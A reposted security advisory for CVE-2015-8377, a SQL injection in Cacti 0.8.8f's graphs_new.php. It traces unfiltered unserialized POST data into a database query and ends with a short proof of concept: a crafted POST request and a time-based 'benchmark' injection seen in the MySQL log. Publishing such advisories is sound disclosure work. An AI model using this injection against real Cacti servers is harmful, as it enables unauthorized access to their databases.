Latest YouTube Video

Sunday, December 13, 2015

[FD] [CVE-2015-8377] Cacti graphs_new.php SQL Injection Vulnerability

========================== Advisory: Cacti SQL Injection Vulnerability Author: xiaotian.wang@dbappsecurity.com.cn Affected Version: 0.8.8.f(the latest version & the older versions) Vendor URL: http://www.cacti.net/ Vendor Status: Unfixed ========================== Vulnerability Description ========================== Vulnerable file: /cacti/graphs_new.php: /cacti/graphs_new.php  line:35  if (!isset($_REQUEST["action"])) { $_REQUEST["action"] = ""; } switch ($_REQUEST["action"]) {    case 'save':              form_save(); // highlight 1              break; ……  Notice the Highlight codes,track function form_save() /cacti/graphs_new.php  line:59 function form_save(){    省略部分代码……    if (isset($_POST["save_component_new_graphs"])) {              host_new_graphs_save();  //highlight 2              header("Location: graphs_new.php?host_id=" . $_POST["host_id"]); …… Track function host_new_graphs_save() /cacti/graphs_new.php  line:126 function host_new_graphs_save() {    $selected_graphs_array = unserialize(stripslashes($_POST["selected_graphs_array"])); //just unserialize,no filter    /* form an array that contains all of the data on the previous form */               ……    debug_log_clear("new_graphs");    while (list($form_type, $form_array) = each($selected_graphs_array)) {              $current_form_type = $form_type;              while (list($form_id1, $form_array2) = each($form_array)) {                         /* enumerate information from the arrays stored in post variables */                         if ($form_type == "cg") {                                   $graph_template_id = $form_id1;                         }elseif ($form_type == "sg") {                                   while (list($form_id2, $form_array3) = each($form_array2)) {                                              $snmp_index_array = $form_array3;                                              $snmp_query_array["snmp_query_id"] = $form_id1;                                              $snmp_query_array["snmp_index_on"] = get_best_data_query_index_type($_POST["host_id"], $form_id1);                                              $snmp_query_array["snmp_query_graph_id"] = $form_id2;  //highlight 3                                   }                                   $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);  //no filter, cause a sql injection. Notice that variable $selected_graphs_array just unserialized the POST variable which we can control without filter. Then the variable goes into a  three-dimensional array , and finally the dirty data we can control enter into the select database query, which caused a SQL injection. ========================== POC && EXP ========================== 1. Login 2. POST  http://target/cacti/graphs_new.php    Data: __csrf_magic=sid%3A55c34c49f0a1e4abf5739766855abdfa96fbc91b%2C1448716384&action=save&save_component_new_graphs=1&host_id=1&selected_graphs_array=[injection] {Injection exp can be found on my server: http://ift.tt/1QmlYJs} 3. mysql log: select graph_template_id from snmp_query_graph where id=1 and benchmark(20000000,sha1(1))-- ====================

Source: Gmail -> IFTTT-> Blogger
Posted by at
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)